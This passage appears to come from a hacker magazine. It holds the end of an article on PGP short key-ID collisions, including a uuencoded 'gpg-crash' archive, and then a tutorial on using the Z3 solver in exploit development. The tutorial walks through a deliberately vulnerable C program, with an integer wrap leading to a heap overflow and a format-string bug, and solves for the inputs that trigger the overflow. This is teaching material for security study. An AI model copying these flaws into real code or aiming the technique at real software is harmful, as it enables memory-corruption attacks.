don't (publicly) duplicate other people's keys.

Finally, I know what you are searching for: the option is --keyid-format
long ;)

---[ 5 - References

[1] "PGP CPU time wasta (never refer to pgp key using 32bit key-id)"
http://seclists.org/fulldisclosure/2010/May/120
[2] "Short key IDs are bad news (with OpenPGP and GNU Privacy Guard)"
http://www.asheesh.org/note/debian/short-key-ids-are-bad-news.html
[3] "OpenPGP Message Format" - Callas, et al - November 2007
https://tools.ietf.org/html/rfc4880
[4] "Cryptanalysis of RSA with Small Prime Difference" - B de Weger - 2002
http://www.enseignement.polytechnique.fr/profs/informatique/Francois.Morain
/Master1/Crypto/projects/Weger02.pdf
[5] Complementary event - Wikipedia
https://en.wikipedia.org/w/index.php?title=Complementary_event&oldid=545752
375#Example_of_the_utility_of_this_concept
[6] y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x) with a
from 1 to (2013 - 1970) with x from 1 to 200 - Wolfram|Alpha
http://wolfr.am/YxKsTU
[7] haveged - A simple entropy daemon
http://www.issihosts.com/haveged/
[8] oclHashcat-plus - advanced password recovery | Performance section
http://hashcat.net/oclhashcat-plus/

---[ 6 - Code

begin 644 gpg-crash.tar.gz
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
8LW[6S_I9/^MG_:R?W^_Y'V5<-G8`>```
`
end


|=[ 0x05 ]=---=[ How to cheat at maths - chown ]=------------------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ How I Cheat at Maths - Z3 101 ]---------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------------=[ by chown ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Introduction

Welcome reader. I am writing this small text because it has recently come
to my attention that a lot of people significantly smarter than me are
intimidated by the mention of Z3 and solvers in general, and avoid using
them. I think it is a common mentality that Z3 requires some kind of maths
degree as a prerequisite for its use, however for me it is the complete
opposite. 

Hopefully by the end of this small guide you will see that Z3 can provide a
trivial platform with which you can avoid doing most of the complex math
work which is associated with exploit development and reverse engineering.

--[ What is Z3?

Z3 is an SMT (satisfiability modulo theories) solver written by Microsoft
Research. It is cross platform, (Windows/Linux/Mac OS X) and free (MIT
License).

Internally at Microsoft it is used for program analysis and verification.

Z3 exposes either a C or Python based API, with a rich set of features. In
this paper we will only scratch the surface of the Python API. I feel this
is the simplest way to jump right in and instantly get value from Z3 with
almost no learning curve required. There is a lot of documentation on the
web if you wish to venture deeper into the functionality of Z3. 

--[ Installing Z3

Installing Z3 is a simple process, and as i mentioned, can be done on most
operating systems. The source code to Z3 is available from the Z3 Github
page (2). 

The build instructions for Mac OS X are simply as follows:

    CXX=clang++ CC=clang python scripts/mk_make.py
    cd build
    make
    sudo make install

For Ubuntu it is even simpler:

    sudo apt-get install python-z3

Once this is done, the Python module can be used by simply using "import
z3" from within Python.

--[ Introduction to Z3

To whet your appetite, we will first explore a simple maths example
unrelated to exploit development. The following small puzzle was being
passed around social media sites:

    A+B   = 240
    C+D   = 500
    D-B+C = 455
    A+C   = 215
    What answer for D?

While this can easily be solved with math, it is much easier to make Z3 do
all the work for us.

The first step in our solver is to import z3 and declare some variables for
use in the solver. The following code creates 4 Int() type variables.
A,B,C,D and initiates the solver class. 

Note: The string passed to each variable is used to label the results when 
the model is printed at the end.

    #!/usr/bin/env python

    from z3 import *

    # Declare our variables
    A = Int('A')
    B = Int('B')
    C = Int('C')
    D = Int('D')

    s = Solver()

Now that we have our variables declared, we must define some simple
constraints for the solver. Basically we need to take each line in the
above problem and convert it to an expression using our variables.

    # Add the constraints
    s.add(A + B == 240)  # A+B   = 240
    s.add(C + D == 500)  # C+D   = 500
    s.add(D-B+C == 455)  # D-B+C = 455
    s.add(A+C == 215)    # A+C   = 215

The final steps are to use the check() function to solve the problem and
print the model at the end.

    print "[+] Solving..."
    s.check()
    ttt = s.model()
    print "[MODEL---------------------------------------]"
    print ttt
    print "[--------------------------------------------]"

Running this code provides the following output:

    $ python facebook.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [C = 20, B = 45, D = 480, A = 195]
    [--------------------------------------------]

As you can see, it only took a couple of minutes to code a solver for this
problem and we got the answer D=480. Congratulations, if you followed this
far you can now cheat at facebook and impress your friends!!!

I have included the sample code for this (facebook.py) in the appendix.

--[ Z3 and Exploit dev

As I'm sure you can now imagine there are a billion small math problems
like this in exploit development. Some typical examples for me are:

* Solving input values to control allocation/copy sizes.
* Root causing a fuzz crash, one constraint for each cmp instruction, then
  control register contents as needed.
* Finding input values which constrain to certain criteria.
* etc.

To make this more clear, I have written a small vulnerable program with
which we can look at the exploitation process and how Z3 can help us.

----[ Vulnerable example

The following example code has a clearly visible integer wrap
vulnerability. We can obviously utilize this to cause a heap overflow into
the chunk pointed to by sstr.

Have a quick read over the code below, and afterwards I will explain the
challenges involved in solving this problem.

     1  #include <stdio.h>
     2  #include <stdlib.h>
     3  #include <string.h>
     4  
     5  #define HEADER "-------------------------------------------[ ASCII
DIAGRAM ]----------------------------------------------------\n"
     6  #define HDRLEN strlen(HEADER)
     7  
     8  char *copyandupdate(char *dst,char *src, unsigned int size)
     9  {
    10      memcpy(dst,src,size);
    11      dst += size;
    12      return dst;
    13  }
    14  
    15  int main(int argc, char *argv[])
    16  {
    17      unsigned int width,height,i;
    18      char *sstr,*fstr;
    19  
    20      if(argc != 3) {
    21          printf("usage: %s <width> <height>\n",argv[0]);
    22          exit(-1);
    23      }
    24  
    25      width  = strtoul(argv[1],NULL,0);
    26      height = strtoul(argv[2],NULL,0);
    27  
    28  
    29      printf("[+] Using width: %u\n",width);
    30      printf("[+] Using height: %u\n",height);
    31  
    32      if(width < 5) {
    33          printf("error: Width too small\n");
    34          exit(1);
    35      }
    36  
    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width *
height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height
+ HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);
    44      if(!fstr) {
    45          printf("error: Out of Memory!\n");
    46          exit(1);
    47      }
    48  
    49      printf("[+] Writing header to buffer (%u bytes)\n",HDRLEN);
    50      fstr = copyandupdate(fstr,HEADER,HDRLEN);
    51      for(i = 0 ; i < height ; i++ )
    52      {
    53          char *m = malloc(width);
    54          if(!m) {
    55              printf("error: Out of Memory!\n");
    56              break;
    57          }
    58          memset(m,'X',width);
    59          m[width-3] = '\r';
    60          m[width-2] = '\n';
    61          m[width-1] = '\x00';
    62          fstr = copyandupdate(fstr,m,width-1);
    63          free(m);
    64      }
    65  
    66      printf(sstr);   
    67  
    68  }
    69  

As I'm sure you saw, this code takes a width and height parameter from the
command line and creates an ascii table containing the appropriate number
of X's.

Here is some sample output from a successful run:

$ ./asciigrid 30 10
[+] Using width: 30
[+] Using height: 10
[+] Allocating buffer sized: 413
[+] Writing header to buffer (113 bytes)
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX

The major vulnerability in this source code occurs between lines 37 and
43 in the source. As you can see below, the code takes the width and height
parameters and checks to make sure that the product of width * height plus
the length of the header is < 0x40000000. Next it allocates a buffer based
on these values. However, if width and height is large enough to create an
integer wrap, the resulting buffer allocation will not correlate to the
width and height values themselves, creating potential for a heap overflow.

    37      if((width * height + HDRLEN) > 0x3fffffff) {
    38          printf("error: Table too large (%u) \n",width *
height);
    39          exit(1);
    40      }
    41  
    42      printf("[+] Allocating buffer sized: %u\n", width * height
+ HDRLEN);
    43      sstr = fstr = malloc(width * height + HDRLEN);

Once this allocation is performed, the program begins by writing the HEADER
field into the buffer. Depending on the size of the buffer this will either
be inside or outside the allocated buffer. Due to the wrapping allocation
size calculation, there is no guarantee at this stage that a large enough
allocation was performed to house the HEADER field. 

Finally at line 51, a copy loop is performed. For each of the lines in
height an allocation of "width" bytes is performed. This is then populated
with a line of X's, and copied into the buffer. Obviously if our values are
large enough to wrap, this loop will end up writing all the way out of
bounds of our buffer, but it also has no way to stop copying, therefore it
will write all the way until it hits an unmapped page, causing program
termination.

    51          for(i = 0 ; i < height ; i++ )
    52          {
    53                  char *m = malloc(width);
    54                  if(!m) {
    55                          printf("error: Out of Memory!\n");
    56                          break;
    57                  }
    58                  memset(m,'X',width);
    59                  m[width-3] = '\r';
    60                  m[width-2] = '\n';
    61                  m[width-1] = '\x00';
    62                  fstr = copyandupdate(fstr,m,width-1);
    63                  free(m);
    64          }

Luckily for us (;)) there does exist a clean way out of this loop. If the
malloc allocation of width bytes fails, the loop is exited, and the program
continues.

This means, if we can wrap the allocation while having a large enough width
to force the allocation to fail, we are able to perform our overflow
(copying the header out of bounds) without program termination occurring.
(This gives us an opportunity to utilize our overflow). The question is,
what input values will allow all this to happen?

---[ Solving

As you can imagine, the next step in our process is to write a simple
solver to calculate these values for us. Once again the process is very
simple

We begin by importing our library:

     1  #!/usr/bin/env python
     2  
     3  from z3 import *
     4  

Next we need to declare the variables used by our sample program. The first
variables which we need are the width and height variables. In the previous
example we used Int() type variables. However, in this case, we use a
BitVec() type. The main difference between these two types in Z3 is the
ability to perform binary operations on the BitVec. Also we are able to
specify the exact size of the variable, this lets us more easily simulate
integer wraps. In this example I am targeting a 32-bit platform, therefore
I use the size 32 for each variable. We also need a variable to hold the
size of the header, this is not strictly necessary but provides a more
clear output in my opinion.

     5  width = BitVec('width', 32)
     6  height = BitVec('height', 32)
     7  headersize = BitVec('headersize',32)
     8  

Next, I create a convenience variable allocsize. This is used to hold the
result of the calculation. Instead of this variable we could simple write
width * height + headersize each time, however if we did this, the size of
the allocation would not be visible in the printed model. Since we care
about this size, it makes sense to use a convenience variable.

     9  allocsize = BitVec('allocsize',32)
    10  
    11  s = Solver()
    12  

Now that we've declared our variables and initialized the Solver the next
step is to add constraints to our model. The first constraint in this
program is simply declaring the headersize value. This is done with the
following line:

    13  s.add(headersize == 113)

The next constraint we can add, is to make sure that width by itself is
enough to cause the allocation to fail, an easy way to do this is to make
sure it is above 0xf0000000, since this would be large enough for a 32-bit
process to fail. You may notice that we used a function "UGT" for this,
rather than the > operator. The reason for this is that the > operator by
default will perform a signed comparison. UGT (unsigned greater than) will
provide us with the unsigned functionality we need. As you can imagine the
counter function to this ULT() will perform an unsigned less than
comparison. Reading the help for the module will show many other useful
functions similar to this.

    14  s.add(UGT(width,0xf0000000)) # For malloc fail

Obviously, we need a constraint to calculate allocsize. This is simply a
case of performing the same calculation directly from the source code.

    15  s.add(allocsize == width * height + headersize)

We then make sure that the allocsize is less than the headersize, so that
an overflow occurs.

    16  s.add(ULT(allocsize & 0xffffffff,headersize))
    17  

Finally, we solve and print the model...

    20  print "[+] Solving..."
    21  s.check()
    22  ttt = s.model()
    23  print "[MODEL---------------------------------------]"
    24  print ttt
    25  print "[--------------------------------------------]"

If we run this solver, the following values are generated:

    $ python solver.py 
    [+] Solving...
    [MODEL---------------------------------------]
    [height = 2318056819,
     width = 4192030789,
     allocsize = 112,
     headersize = 113]
    [--------------------------------------------]

Inputting this into the target program confirms our technique, an
allocation of 112 bytes is performed and then a header (113) bytes is
written to it. Finally an allocation fails, and the loop is exited, then
the buffer is printf'ed. (in a vulnerable way... ;) )

$ ./asciigrid 4192030789 2318056819
[+] Using width: 4192030789
[+] Using height: 2318056819
[+] Allocating buffer sized: 112
[+] Writing header to buffer (113 bytes)
asciigrid(98654,0xa33e5000) malloc: *** mach_vm_map(size=4192034816) failed
(error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
error: Out of Memory!
-------------------------------------------[ ASCII DIAGRAM
]----------------------------------------------------

Finding a way to leverage this overflow is outside of the scope of this
paper, however I have personally leveraged a very similar situation in a
real life application.


---[ Adding constraints to enumerate possibilities?

In the above example, the solver gave us a situation where the buffer was
sized 1 byte smaller than the copy, however, in real life, most allocators
naturally align sizes before returning a chunk to the program. This means
that in the above example, no overflow would actually take place. Also with
the above situation, we often want to enumerate the QUANTUM sizes which we
can utilize on the heap, so we can look for overflow targets etc.

Z3 is not really designed for this, solving all permutations, and is more
